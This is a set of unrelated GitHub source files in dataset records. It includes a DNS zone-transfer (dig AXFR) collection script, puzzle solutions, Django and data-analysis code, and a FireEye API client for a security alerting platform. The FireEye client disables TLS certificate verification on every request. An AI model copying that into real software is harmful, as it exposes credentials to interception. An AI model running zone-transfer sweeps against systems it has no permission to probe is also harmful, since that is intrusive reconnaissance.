os.path.join(os.path.dirname(__file__),'..','var','zonetransfer.log')\n\t\tlogging.basicConfig(format='%(asctime)s %(message)s', filename=LOGFILE, level=logging.INFO)\n\t\t# get timestamp\n\t\tself.now = datetime.now()\n\t\n\tdef get_dig_axfr_output(self, hostname, nameserver):\n\t\tlogging.info(\"Start zonetransfer for %s on %s\" %(hostname, nameserver))\n\t\tproc = subprocess.Popen([\"/usr/bin/dig\", \"AXFR\", hostname, \"@\" + nameserver, \"+nocomments\", \"+nocmd\", \"+noquestion\", \"+nostats\", \"+time=15\"], stdout=subprocess.PIPE)\n\t\toutput = proc.stdout.read()\n\t\treturn output\n\t\t\n\tdef zone_transfer_succeeded(self, zone_data):\n\t\tif \"Transfer failed.\" in zone_data:\n\t\t\tlogging.error(zone_data)\n\t\t\treturn False\n\t\tif \"failed: connection refused.\" in zone_data:\n\t\t\tlogging.error(zone_data)\n\t\t\treturn False\n\t\tif \"communications error\" in zone_data:\n\t\t\tlogging.error(zone_data)\n\t\t\treturn False\n\t\tif \"failed: network unreachable.\" in zone_data:\n\t\t\tlogging.error(zone_data)\n\t\t\treturn False\n\t\tif \"failed: host unreachable.\" in zone_data:\n\t\t\tlogging.error(zone_data)\n\t\t\treturn False\n\t\tif \"connection timed out; no servers could be reached\" in zone_data:\n\t\t\tlogging.error(zone_data)\n\t\t\treturn False\n\t\tif zone_data == \"\":\n\t\t\tlogging.error(\"Unknown error\")\n\t\t\treturn False\n\t\tlogging.info(\"Zonetransfer succeeded\")\n\t\treturn True\n\t\t\n\tdef write_dig_output(self, hostname, nameserver, dig_output):\n\t\tif hostname == \".\":\n\t\t\thostname = \"root\"\n\t\tif hostname.endswith( \".\" ):\n\t\t\tdir_path = os.path.join(self.archives, hostname[:-1])\n\t\telse:\n\t\t\tdir_path = os.path.join(self.archives, hostname)\n\t\tif not os.path.exists( dir_path ):\n\t\t\tos.makedirs( dir_path )\n\t\tfilename = os.path.join(dir_path, self.now.strftime(\"%Y%m%d%H%M%S\") + \"_\" + nameserver + \".zone\")\n\t\tlogging.info(\"Write zonefile to \" + filename)\n\t\tfile_handler = open( filename, \"w\" )\n\t\tfile_handler.write(\n\t\t\tdig_output\n\t\t)\n\t\tfile_handler.close()\n \t\n\tdef transfer(self):\n\t\tfor zone in zoneconfig.ZONE:\n\t\t\tzone_data = self.get_dig_axfr_output(zone,zoneconfig.ZONE[zone])\n\t\t\tif self.zone_transfer_succeeded(zone_data):\n\t\t\t\tself.write_dig_output(zone, zoneconfig.ZONE[zone], zone_data)\n\t\t\t\t\n\n\t\n\n\n\nif __name__ == \"__main__\":\n\ta = Zonetransfer()\n\ta.transfer()\n\n\n","repo_name":"samuelpulfer/tld-analysis","sub_path":"bin/zonetransfer.py","file_name":"zonetransfer.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74728523742","text":"\"\"\" Solution to Day 14\n\nfrom: http://adventofcode.com/2016/day/14\n\n--- Part Two ---\n\nOf course, in order to make this process even more secure, you've also implemented key stretching.\n\nKey stretching forces attackers to spend more time generating hashes. Unfortunately, it forces\neveryone else to spend more time, too.\n\nTo implement key stretching, whenever you generate a hash, before you use it, you first find the\nMD5 hash of that hash, then the MD5 hash of that hash, and so on, a total of 2016 additional\nhashings. 
Always use lowercase hexadecimal representations of hashes.\n\nFor example, to find the stretched hash for index 0 and salt abc:\n\nFind the MD5 hash of abc0: 577571be4de9dcce85a041ba0410f29f.\nThen, find the MD5 hash of that hash: eec80a0c92dc8a0777c619d9bb51e910.\nThen, find the MD5 hash of that hash: 16062ce768787384c81fe17a7a60c7e3.\n...repeat many times...\nThen, find the MD5 hash of that hash: a107ff634856bb300138cac6568c0f24.\nSo, the stretched hash for index 0 in this situation is a107ff.... In the end, you find the original\nhash (one use of MD5), then find the hash-of-the-previous-hash 2016 times, for a total of 2017 uses\nof MD5.\n\nThe rest of the process remains the same, but now the keys are entirely different. Again for salt\nabc:\n\nThe first triple (222, at index 5) has no matching 22222 in the next thousand hashes.\nThe second triple (eee, at index 10) hash a matching eeeee at index 89, and so it is the first key.\nEventually, index 22551 produces the 64th key (triple fff with matching fffff at index 22859.\nGiven the actual salt in your puzzle input and using 2016 extra MD5 calls of key stretching, what\nindex now produces your 64th one-time pad key?\n\"\"\"\n\nimport hashlib\nimport re\n\nclass StretchedHasher(object):\n \"\"\"Class for generating a stretched hash, with internal caching for speed!\"\"\"\n def __init__(self):\n self.cache = dict()\n\n def generate_hash(self, salt):\n \"\"\"Return the result of hashing the salt with MD5 2017 times\"\"\"\n\n # check for cache hit\n if salt in self.cache.keys():\n return self.cache[salt]\n\n if len(self.cache.keys()) >= 1000:\n # clean up the salt with the lowest index in the cache to optimize space\n del self.cache[sorted(self.cache.keys(), key=lambda salt: int(re.findall(r'[0-9]+', salt)[0]))[0]]\n\n stretched_hash = hashlib.md5(str.encode(salt)).hexdigest()\n for i in range(0, 2016):\n stretched_hash = hashlib.md5(str.encode(stretched_hash)).hexdigest()\n\n # add computed hash to the cache\n self.cache[salt] = stretched_hash\n\n return stretched_hash\n\ndef generates_key(salt, index, hasher):\n \"\"\"Returns true if the stretched hash of salt and the index contains one character three times\n in a row, and one of the next 1000 stretched hashes with the same salt and an increasing index\n contains the same character five times in a row\"\"\"\n starting_hash = hasher.generate_hash(salt + str(index))\n match = re.search(r'([a-z0-9])\\1\\1', starting_hash)\n if match is None:\n return (False, hasher)\n repeat_target = match[1] + match[1] + match[1] + match[1] + match[1]\n for i in range(index + 1, index + 1001):\n new_hash = hasher.generate_hash(salt + str(i))\n if repeat_target in new_hash:\n return (True, hasher)\n return (False, hasher)\n\n\ndef main():\n \"\"\"Execution of solution\"\"\"\n salt = 'abc'\n index = 0\n key_count = 0\n hasher = StretchedHasher()\n while key_count < 64:\n # print(\"Checking index \" + str(index))\n result = generates_key(salt, index, hasher)\n hasher = result[1]\n if result[0]:\n key_count += 1\n index += 1\n print(index - 1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kmcginn/advent-of-code","sub_path":"2016/day14/one_time_pad2.py","file_name":"one_time_pad2.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30781946201","text":"# vim: sw=4:ts=4:et:cc=120\n#\n\n#\n# utility routines for dealing with FireEye's API\n#\n\nimport base64\nimport datetime\nimport functools\nimport 
inspect\nimport io\nimport logging\nimport os, os.path\nimport re\nimport types\nimport zipfile\n\nimport requests\n\nimport saq\nfrom saq.util import format_iso8601\n\n# the \"duration\" for getting alerts seems to be hardcoded to these possible values\nVALID_DURATIONS = { 1: '1_hour', \n 2: '2_hours',\n 6: '6_hours',\n 12: '12_hours',\n 24: '24_hours',\n 48: '48_hours', }\n\n# valid \"malware object types\" according to fireeye\n\nDOMAIN_MATCH = 'domain_match'\nMALWARE_CALLBACK = 'malware_callback'\nMALWARE_OBJECT = 'malware_object'\nWEB_INFECTION = 'web_infection'\nINFECTION_MATCH = 'infection_match'\n\nVALID_MALWARE_OBJECT_TYPES = [\n DOMAIN_MATCH,\n MALWARE_CALLBACK,\n MALWARE_OBJECT,\n WEB_INFECTION,\n INFECTION_MATCH,\n]\n\n# various keys in the fireeye json data\nKEY_ALERT = 'alert'\nKEY_EXPLANATION = 'explanation'\nKEY_ACTION = 'action'\nKEY_PRODUCT = 'product'\nKEY_MALWARE_DETECTED = 'malwareDetected'\nKEY_MALWARE = 'malware'\nKEY_NAME = 'name'\nKEY_SRC = 'src'\nKEY_SMTP_MAIL_FROM = 'smtpMailFrom'\nKEY_SMTP_MESSAGE = 'smtpMessage'\nKEY_SUBJECT = 'subject'\nKEY_OCCURRED = 'occurred'\nKEY_MD5 = 'md5Sum'\nKEY_SHA256 = 'sha256'\nKEY_DST = 'dst'\nKEY_SMTP_TO = 'smtpTo'\nKEY_IP = 'ip'\nKEY_ID = 'id'\nKEY_UUID = 'uuid'\nKEY_TYPE = 'type'\nKEY_URL = 'url'\n\nKEY_ARTIFACTS_INFO_LIST = 'artifactsInfoList'\nKEY_ARTIFACT_TYPE = 'artifactType'\nKEY_ARTIFACT_NAME = 'artifactName'\n\nARTIFACT_TYPE_RAW_EMAIL = 'raw_email'\n\ndef require_api_token_generator(func):\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n try:\n self.acquire_api_token()\n yield from func(self, *args, **kwargs)\n except requests.exceptions.HTTPError as e:\n # 404 - data isn't there\n if e.response.status_code != 404 and (400 <= e.response.status_code <= 499):\n self.acquire_api_token(reset=True)\n yield from func(self, *args, **kwargs)\n else:\n raise e\n\n return wrapper\n\ndef require_api_token(func):\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n try:\n self.acquire_api_token()\n return func(self, *args, **kwargs)\n except requests.exceptions.HTTPError as e:\n if e.response.status_code != 404 and (400 <= e.response.status_code <= 499):\n self.acquire_api_token(reset=True)\n return func(self, *args, **kwargs)\n else:\n raise e\n\n return wrapper\n\ndef require_api_token_for_generator(func):\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n try:\n self.acquire_api_token()\n result = func(self, *args, **kwargs)\n if isinstance(result, types.GeneratorType):\n yield from result\n else:\n return result\n except requests.exceptions.HTTPError as e:\n if 400 <= e.response.status_code <= 499:\n self.acquire_api_token(reset=True)\n result = func(self, *args, **kwargs)\n if isinstance(result, types.GeneratorType):\n yield from result\n else:\n return result\n\n return wrapper\n\nclass FireEyeAPIClient(object):\n def __init__(self, host, user, password):\n self.fe_host = host\n self.fe_user_name = user\n self.fe_password = password\n self.api_token = None\n\n def acquire_api_token(self, reset=False):\n if reset:\n self.api_token = None\n\n if self.api_token is not None:\n return self.api_token\n\n logging.debug(f\"logging into fireeye api with username {self.fe_user_name}\")\n headers={ 'Authorization': 'Basic {}'.format(base64.b64encode(f'{self.fe_user_name}:{self.fe_password}'.encode()).decode()), }\n response = requests.post(f'https://{self.fe_host}/wsapis/v2.0.0/auth/login?',\n verify=False, # <-- XXX fix\n headers=headers)\n\n response.raise_for_status()\n\n self.api_token = 
response.headers['X-FeApi-Token']\n logging.debug(f\"got api token {self.api_token}\")\n return self.api_token\n\n def close(self):\n if self.api_token is None:\n return \n\n headers = { \n 'X-FeApi-Token': self.api_token,\n }\n\n response = requests.post(f'https://{self.fe_host}/wsapis/v2.0.0/auth/logout',\n verify=False, # <-- XXX fix\n headers=headers)\n\n response.raise_for_status()\n logging.debug(f\"logged out api key {self.api_token}\")\n\n @require_api_token_generator\n def get_alerts(self, start_time, duration):\n assert isinstance(start_time, datetime.datetime)\n assert isinstance(duration, int)\n\n if duration not in VALID_DURATIONS:\n raise ValueError(f\"invalid duration for fireeye get_alerts: {duration}\")\n\n duration_text = VALID_DURATIONS[duration]\n start_time = format_iso8601(start_time)\n\n headers = { \n 'X-FeApi-Token': self.api_token,\n 'Accept': 'application/json' }\n\n response = requests.get(f'https://{self.fe_host}/wsapis/v2.0.0/alerts?start_time={start_time}&duration={duration_text}',\n params={\n 'info_level': 'extended',\n },\n verify=False, # <-- XXX fix\n headers=headers)\n\n response.raise_for_status()\n json_result = response.json()\n\n if KEY_ALERT not in json_result:\n logging.error(f\"missing {KEY_ALERT} in fireeye json result\")\n\n for alert in json_result[KEY_ALERT]:\n yield alert\n\n @require_api_token\n def get_alert(self, alert_id):\n assert isinstance(alert_id, int) or (isinstance(alert_id, str) and int(alert_id))\n \n headers = { \n 'X-FeApi-Token': self.api_token,\n 'Accept': 'application/json' }\n\n response = requests.get(f'https://{self.fe_host}/wsapis/v2.0.0/alerts/alert/{alert_id}',\n params={ 'info_level': 'extended' },\n verify=False, # <-- XXX fix\n headers=headers)\n\n response.raise_for_status()\n return response.json()\n\n @require_api_token\n def get_artifacts_by_uuid(self, target_dir, alert_uuid):\n \"\"\"Returns a tuple of (dict, str) where dict is the JSON for the artifact metadata\n and str is the path to the zip file that contains the artifacts.\"\"\"\n\n # first download the metadata of what's available for this alert id\n headers = { \n 'X-FeApi-Token': self.api_token,\n 'Accept': 'application/json' }\n\n response = requests.get(f'https://{self.fe_host}/wsapis/v2.0.0/artifacts/{alert_uuid}/meta',\n verify=False, # <-- XXX fix\n headers=headers)\n\n response.raise_for_status()\n json_result = response.json()\n\n if len(json_result[KEY_ARTIFACTS_INFO_LIST]) == 0:\n logging.debug(f\"no artifacts listed for {alert_uuid}\")\n return json_result\n\n headers = { \n 'X-FeApi-Token': self.api_token }\n #'Accept': 'application/octet-stream' }\n\n response = requests.get(f'https://{self.fe_host}/wsapis/v2.0.0/artifacts/{alert_uuid}',\n stream=True,\n verify=False, # <-- XXX fix\n headers=headers)\n\n response.raise_for_status()\n\n zip_path = os.path.join(target_dir, f'fe_artifacts_{alert_uuid}.zip')\n with open(zip_path, 'wb') as fp:\n for buffer in response.iter_content(io.DEFAULT_BUFFER_SIZE):\n fp.write(buffer)\n\n logging.info(f\"saved fireeye artifacts for {alert_uuid} to {zip_path}\")\n\n try:\n zip_fp = zipfile.ZipFile(zip_path)\n for artifact_entry in json_result[KEY_ARTIFACTS_INFO_LIST]:\n file_name = artifact_entry[KEY_ARTIFACT_NAME]\n file_type = artifact_entry[KEY_ARTIFACT_TYPE]\n logging.debug(f\"extracting {file_name} type {file_type} from {zip_path}\")\n try:\n zip_fp.extract(file_name, path=target_dir)\n except KeyError as e:\n logging.error(f\"file {file_name} does not exist in the zip file {zip_path}\")\n continue\n 
except zipfile.BadZipFile as e:\n logging.error(f\"fireeye artifact file {zip_path} for {alert_uuid} is bad: {e}\")\n\n os.remove(zip_path)\n return json_result\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n try:\n self.close()\n except Exception as e:\n logging.error(f\"attempt to close fireeye connection failed: {e}\")\n return False\n","repo_name":"ace-ecosystem/ACE","sub_path":"saq/fireeye.py","file_name":"fireeye.py","file_ext":"py","file_size_in_byte":8890,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"7"}
{"seq_id":"15196282671","text":"import sys\nimport subprocess\n\ndef clip(output):\n process = subprocess.Popen('pbcopy', env={'LANG': 'en_US.UTF-8'}, stdin=subprocess.PIPE)\n process.communicate(output.encode())\n\n# takes the argument from your terminal, stores it in a variable, splits that variable by '?source' (the point where Medium knows you're clicking this link from your email)\n\nlink = sys.argv[1]\n\nlink = link.split('?source')\n\n# stores the basic link to the article\n\nfinal_link = link[0]\n\n# copies the link to your clipboard so you can directly paste it in your browser\n\nclip(final_link)\n","repo_name":"nandanv2702/PersonalProjects","sub_path":"medium.py","file_name":"medium.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"11331234033","text":"from django.conf import settings\n\nfrom django.views.generic.simple import direct_to_template\nfrom django.conf.urls.defaults import patterns, url, include\n\n\n#from django.views.generic.simple import direct_to_template\n\n\nurlpatterns = patterns('',\n url(r'^$', direct_to_template, {\n 'template': 'index.html'}),\n url(r'^', include('debug_toolbar_htmltidy.urls'))\n)\n\nif settings.DEBUG:\n urlpatterns += patterns('',\n (r'^media/(.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT,\n }))\n","repo_name":"mklymyshyn/django-dtpanel-htmltidy","sub_path":"example_htmltidy/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"7"}
{"seq_id":"2082884911","text":"import yaml\nimport os\n\n\n# Read a yaml-type config file\ndef read_data(filepath):\n \"\"\"\n Read a yaml-type config file\n :param filepath: path of the yaml file\n :return: the data read from the file\n \"\"\"\n with open(filepath, \"r\", encoding=\"utf-8\") as fs:\n return yaml.safe_load(fs)\n\n\nif __name__ == '__main__':\n filepath = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"testdata\", \"data_登录.yaml\")\n rd = read_data(filepath)\n print(rd[\"login\"][\"user\"])","repo_name":"Owen-ET/TX-Class","sub_path":"Desktop/GitTest/2021_SQM_Project/B2B_UI_Automate_Code/study_web_unit/common/handle_yaml.py","file_name":"handle_yaml.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"38433196598","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Mental Health Survey in Tech - Data Exploration and Cleaning\n\n# This dataset is from a 2014 survey that measures attitudes towards mental health and frequency of mental health disorders in the tech workplace. 
\n# **Source**: https://www.kaggle.com/osmi/mental-health-in-tech-survey\n# \n# In this workshop we don't have enough time to go through a full tutorial of writing cleaner code, but we will review a few tips:\n# \n# - **Tip 1**: Refactoring code for reusability and separation of concerns\n# - **Tip 2**: Auto-saving artifacts (data, tables, charts, etc.) and adding time-stamps \n# \n# **Run cells from 1 to 14 (Tip 1: Refactoring)**\n\n# In[1]:\n\n\nimport pandas as pd\nimport altair as alt\nfrom datetime import date\n#alt.themes.enable('latimes')\nget_ipython().run_line_magic('load_ext', 'watermark')\nget_ipython().run_line_magic('watermark', '--iversions -w -v -u -d -m')\n\n\n# ## Read data in\n\n# In[2]:\n\n\ntech = pd.read_csv('../data/mental_health_tech_data.csv', sep=',')\ntech.head(2)\n\n\n# ## Dataset missing values\n\n# In[3]:\n\n\ntech.isnull().sum()\n\n\n# In[4]:\n\n\ntech_d = tech.dropna(axis='columns')\ntech_d.shape\n\n\n# In[5]:\n\n\ntech_d.head(2)\n\n\n# In[6]:\n\n\ntech_d.isnull().sum()\n\n\n# ## Select and clean features\n\n# In[7]:\n\n\n# we will drop some features because they require too much pre-processing for our current purposes\nto_drop = ['Timestamp', 'no_employees', 'Gender', 'Country'] \ntech_d = tech_d.drop(to_drop, axis=1)\n\n\n# In[8]:\n\n\n# we reduced the dataset to 19 features\ntech_d.shape \n\n\n# In[9]:\n\n\n# we have only one quantitative variable\ntech_d.describe()\n\n\n# The values of age do not make sense. Looks like we have negative values and values over 100.\n# Let's clean that up a bit.\n\n# In[10]:\n\n\n# keep ages <= 100 AND >= 15\ntech_d = tech_d[(tech_d['Age'] <= 100) & (tech_d['Age'] >= 15)] \ntech_d.describe()\n\n\n# In[11]:\n\n\n# check balance of target feature\ntech_d['treatment'].value_counts()\n\n\n# ## Explore variables\n\n# In[12]:\n\n\n# for real-valued variables, histograms work great\nhist_1 = alt.Chart(tech_d).mark_bar().encode(\n x='Age',\n y='count()')\nhist_1\n\n\n# In[13]:\n\n\n# for categorical variables, counts are a good idea\nbar_1 = alt.Chart(tech_d).mark_bar().encode(\n x='count()',\n y='treatment:N')\nbar_1\n\n\n# ## Tip 1: Refactoring code\n# \n# At this point we realize that we need to create a reusable function if we want to continue doing multiple similar plots. We need to change the structure of the code while maintaining its behavior. This is what we call **'refactoring'**. For instance, if we want to generate the same chart multiple times changing the variable, we can do something like this:\n\n# In[14]:\n\n\ndef plot_cat(variable: str) -> 'Chart':\n '''plot categorical variables\n Parameters:\n variable: variable name \n ---\n Returns:\n Altair bar chart\n '''\n chart = alt.Chart(tech_d).mark_bar().encode(\n x='count()',\n y=variable,\n color=alt.Color(variable, legend=None))\n return chart\n\n\n# You may notice that I added a `docstring` documenting both **what goes in**, the `Parameters`, and what **goes out**, the `Return` statement. 
Adding a `docstring` is a way to document the logic of the function, which facilitates future use and debugging.\n# \n# Below we use our `plot_cat` function to create a dashboard of bar-charts\n\n# In[15]:\n\n\n# we can concatenate charts together pretty easily\npanel_chart1 = (plot_cat('family_history') | plot_cat('remote_work')) & (plot_cat('care_options') | plot_cat('anonymity')) \npanel_chart1\n\n\n# Now let's plot the same variables grouped by treatment (target).\n\n# In[16]:\n\n\nbar_2 = alt.Chart(tech_d).mark_bar().encode(\n x='count()',\n y='family_history',\n color='treatment')\nbar_2\n\n\n# Nice, now we can **refactor** the code as before to make multiple plots.\n\n# In[17]:\n\n\ndef plot_grouped_cat(variable: str) -> 'Chart':\n chart = alt.Chart(tech_d).mark_bar().encode(\n x='count()',\n y=variable,\n color=alt.Color('treatment:N'))\n return chart\n\n\n# In[18]:\n\n\npanel_chart2 = (plot_grouped_cat('family_history') | plot_grouped_cat('remote_work')) & (plot_grouped_cat('care_options') | plot_grouped_cat('anonymity'))\npanel_chart2\n\n\n# ## Tip 2: saving and time-stamping artifacts\n# \n# **Automating the saving of artifacts**, like post-processed data, figures, and others, can save you a lot of typing and time. It also allows you to run your code beginning to end with confidence. **Explicitly time-stamping your artifacts** can help you to easily identify different versions of your analysis. Images can add up to large directories, so be mindful before committing to git/GitHub. One option is to add your results directory to the .gitignore file (after all, your code can reproduce them automatically!).\n\n# In[19]:\n\n\ndate_stamp = date.today().strftime('%Y-%b-%d')\npath = '../results'\nhist_1.save(f'{path}/hist_1_{date_stamp}.png')\nbar_1.save(f'{path}/bar_1_{date_stamp}.png')\nbar_2.save(f'{path}/bar_2_{date_stamp}.png')\npanel_chart1.save(f'{path}/panel_chart_1_{date_stamp}.png')\npanel_chart2.save(f'{path}/panel_chart_2_{date_stamp}.png')\n\n\n# ## Save Data\n\n# In[20]:\n\n\npath = '../data'\ntech_d.to_csv(f'{path}/mental_health_tech_data_post.csv')\n\n\n# ## Exporting to python script\n\n# If you like to do your exploratory data analysis in Jupyter, you may consider saving a .py version of your code in case other people don't use Jupyter. 
It also has the advantage of being easy to run in the console (with a few changes, like commenting out magic commands like %watermark)\n","repo_name":"pabloinsente/sf_for_beh_ss","sub_path":"src/eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"7"}
{"seq_id":"11946090017","text":"from django.shortcuts import render\nfrom .forms import ProductForm, RawProductForm\nfrom .models import Product\n# Create your views here.\n\ndef product_create_view(request):\n my_form = RawProductForm()\n if request.method == \"POST\":\n my_form = RawProductForm(request.POST)\n if my_form.is_valid():\n # now the data is good\n print(my_form.cleaned_data)\n Product.objects.create(**my_form.cleaned_data)\n else:\n print(my_form.errors)\n context = {\n \"form\": my_form\n }\n return render(request, \"products/product_create.html\", context)\n\n'''def product_create_view(request):\n #print (request.GET)\n #print(request.POST)\n my_new_title=request.POST.get('title')\n print(my_new_title)\n context = {}\n return render(request, \"products/product_create.html\", context)'''\n\n\n'''def product_create_view(request):\n form = ProductForm(request.POST or None)\n if form.is_valid():\n form.save()\n form=ProductForm()\n print(request.user)\n\n context={\n 'form': form\n }\n return render(request, \"products/product_create.html\", context)'''\n\n\n\ndef product_detail_view(request):\n obj=Product.objects.get(id=1)\n #'''context={\n # 'title': obj.title,\n # 'description': obj.description\n # }'''\n context={\n 'object': obj\n }\n return render(request, \"products/product_detail.html\", context)\n","repo_name":"amanjha18/django_project","sub_path":"trydjango/src/trydjango/products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
{"seq_id":"2238046803","text":"import numpy as np\n\ndef hatch_area():\n n = int(input())\n matrix = []\n\n for i in range(n):\n temp = [int(num) for num in input().split()]\n matrix.append(temp)\n\n max_hatch = np.min(matrix)\n\n for i in range(n):\n for j in range(n):\n if i >= n - 1 - j:\n if matrix[i][j] > max_hatch:\n max_hatch = matrix[i][j]\n\n print(max_hatch)\n","repo_name":"Annateranna/pytonProject_test","sub_path":"ekz512.py","file_name":"ekz512.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"9835583329","text":"import os\n\nimport art\n\nfrom revisport.reporting import reporting_menu\nfrom revisport.favourites import favourites_menu\nfrom revisport.contact import contact_menu\nfrom revisport.quit import quit_menu\nfrom revisport.helpers import prepare_data\nfrom revisport.colors import GREEN, WHITE, CYAN, PURPLE, YELLOW\n\n\ndef welcome_message():\n \"\"\"\n Prints the welcome message when the program starts.\n \"\"\"\n print(art.text2art('ReVisPort'))\n print(\"Welcome to ReVisPort!\\n\")\n print(\"It has never been easy to create simple reports.\")\n print(\n \"ReVisPort navigates you step by step to explore climate\",\n \"data for EU-countries.\")\n print(\n \"You can save interesting data\",\n \"insights to come back to them later on.\")\n print(GREEN)\n print(\"ReVisPort is getting ready ...\")\n\n return\n\n\ndef load_data(SHEET):\n \"\"\"\n Loads climate data which are used to generate a report.\n\n Args:\n SHEET(obj): Google sheet object where data 
are stored.\n \"\"\"\n return prepare_data(SHEET, 'owid-co2-data', 'filter')\n\n\ndef main_menu(SHEET, input_data):\n \"\"\"\n Prints main/welcome menu, a user should select from.\n\n Args:\n SHEET(obj): Google sheet object where data are stored.\n input_data(data frame): Data which are used to\n generate a report.\n\n Returns:\n False/True: True when the app should be closed.\n False when the app should return HOME.\n \"\"\"\n print(WHITE)\n print(\"---------\")\n print(\"HOME MENU\")\n print(\"---------\")\n print(CYAN)\n print(\"Please select an option from the menu below:\")\n print(\" 1: Reporting\")\n print(\" 2: Favourites\")\n print(\" 3: Contact\")\n print(' 0: Quit')\n\n while True:\n try:\n print(PURPLE + \"Enter your choice: \" + WHITE, end='')\n answer = int(input().strip())\n\n except ValueError:\n print(YELLOW + \"You did not enter a number.\\n\")\n continue\n\n if answer == 1:\n os.system('clear')\n print(GREEN + 'Reporting selected.')\n reporting_menu(SHEET, input_data)\n break\n elif answer == 2:\n os.system('clear')\n favourites_menu(SHEET, input_data)\n break\n elif answer == 3:\n os.system('clear')\n contact_menu(SHEET, input_data)\n break\n elif answer == 0:\n quit_menu(SHEET)\n return True\n else:\n print(\n YELLOW +\n \"Invalid choice, please enter a number between 0 and 3!\\n\"\n )\n\n return False\n","repo_name":"brodsa/re-vis-port","sub_path":"revisport/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7975792644","text":"import csv\r\n\r\nee = open(\"output6.txt\",'r',encoding='utf8')\r\nhh = open (\"H.txt\",'r',encoding='utf8')\r\nee1 = ee.readlines()\r\nhh1=hh.readlines()\r\nee.close()\r\nhh.close()\r\nee1=ee1[0].split(\", \")\r\nhh1=hh1[0].split(\"', '\")\r\nprint(len(ee1))\r\nprint(len(hh1))\r\n \r\nwith open('train.csv',encoding='utf8') as csv_file, open('train_1.csv', 'w', encoding='utf8', newline='') as write_obj:\r\n csv_reader = csv.reader(csv_file, delimiter=',')\r\n csv_writer = csv.writer(write_obj)\r\n line_count = 0\r\n for row in csv_reader:\r\n if line_count !=0:\r\n a = row[2]\r\n a=a.split()\r\n #print(a)\r\n b=\"\"\r\n for i in range(len(a)):\r\n dee=0\r\n for j in range(len(ee1)):\r\n if a[i]==ee1[j][1:-1]:\r\n b = b + \" \" + (hh1[j])\r\n dee+=1\r\n break\r\n if(dee==0):\r\n b= b+\" \" + \"undefined\"\r\n #print(b)\r\n row.append(b)\r\n csv_writer.writerow(row)\r\n line_count+=1\r\n print(line_count)\r\n\r\n","repo_name":"0xproflupin/DeepBhashan","sub_path":"dataset/csv_mapping_EnglishToHindi.py","file_name":"csv_mapping_EnglishToHindi.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"1163878897","text":"#After Chris's code\nfrom pyspark.ml.feature import VectorAssembler\nfrom pyspark.mllib.regression import LabeledPoint\nfrom pyspark.sql.functions import col\n\n\n# N Gram Features\n\ndf[\"unigram_overlap\"] = df.apply(lambda x: len(set(x[\"text_unigrams\"]) & set(x[\"hyp_unigrams\"])), axis = 1)\ndf[\"bigram_overlap\"] = df.apply(lambda x: len(set(x[\"text_bigrams\"]) & set(x[\"hyp_bigrams\"])), axis = 1)\ndf[\"trigram_overlap\"] = df.apply(lambda x: len(set(x[\"text_trigrams\"]) & set(x[\"hyp_trigrams\"])), axis = 1)\ndf[\"quadgram_overlap\"] = df.apply(lambda x: len(set(x[\"text_quadgrams\"]) & set(x[\"hyp_quadgrams\"])), axis = 1)\ndf[\"figram_overlap\"] = df.apply(lambda x: len(set(x[\"text_figrams\"]) & 
set(x[\"hyp_figrams\"])), axis = 1)\n\n# POS Features\n\n\n\n\n# Named Entity Features\n\n\n\n\n# Tree Features\n\n\n# Sentiment Features\n\n\n#Extra-unigram Features\ndf[\"hyp_extra\"]= df.apply(lambda x: len(set(x[\"hyp_unigrams\"]) - set(x[\"text_unigrams\"])), axis = 1)\ndf[\"text_extra\"]= df.apply(lambda x: len(set(x[\"text_unigrams\"]) - set(x[\"hyp_unigrams\"])), axis = 1)\n\n\n# After building features convert to sparkSQL dataframe\ndfs = sqlCtx.createDataFrame(df)\n\n#Machine Learning\nassembler = VectorAssembler(inputCols =[\"unigram_overlap\",\"bigram_overlap\",\"trigram_overlap\",\"quadgram_overlap\",\"figram_overlap\"],outputCol =\"outcome\")\n\ntransformed = assembler.transform(dfs)\n\nLPs =transformed.select(col(\"outcome\").alias(\"label\"),col(\"unigram_overlap\").alias(\"features\")).map(lambda row: LabeledPoint(row.label,row.features))\nrddLPs = dfs.map(lambda row: LabeledPoint(row[\"outcome\"],[row[-5:]]))\n(trainingData, testData) =rddLPs.randomSplit([0.7, 0.3])\nmodel = RandomForest.trainClassifier(trainingData, numClasses=2, categoricalFeaturesInfo={},\n numTrees=3, featureSubsetStrategy=\"auto\",\n impurity='gini', maxDepth=4, maxBins=32)\npredictions = model.predict(testData.map(lambda x: x.features))\nlabelsAndPredictions = testData.map(lambda lp: lp.label).zip(predictions)\ntestErr = labelsAndPredictions.filter(lambda x: x[0] != x[1]).count() / float(testData.count())\nprint('Test Error = ' + 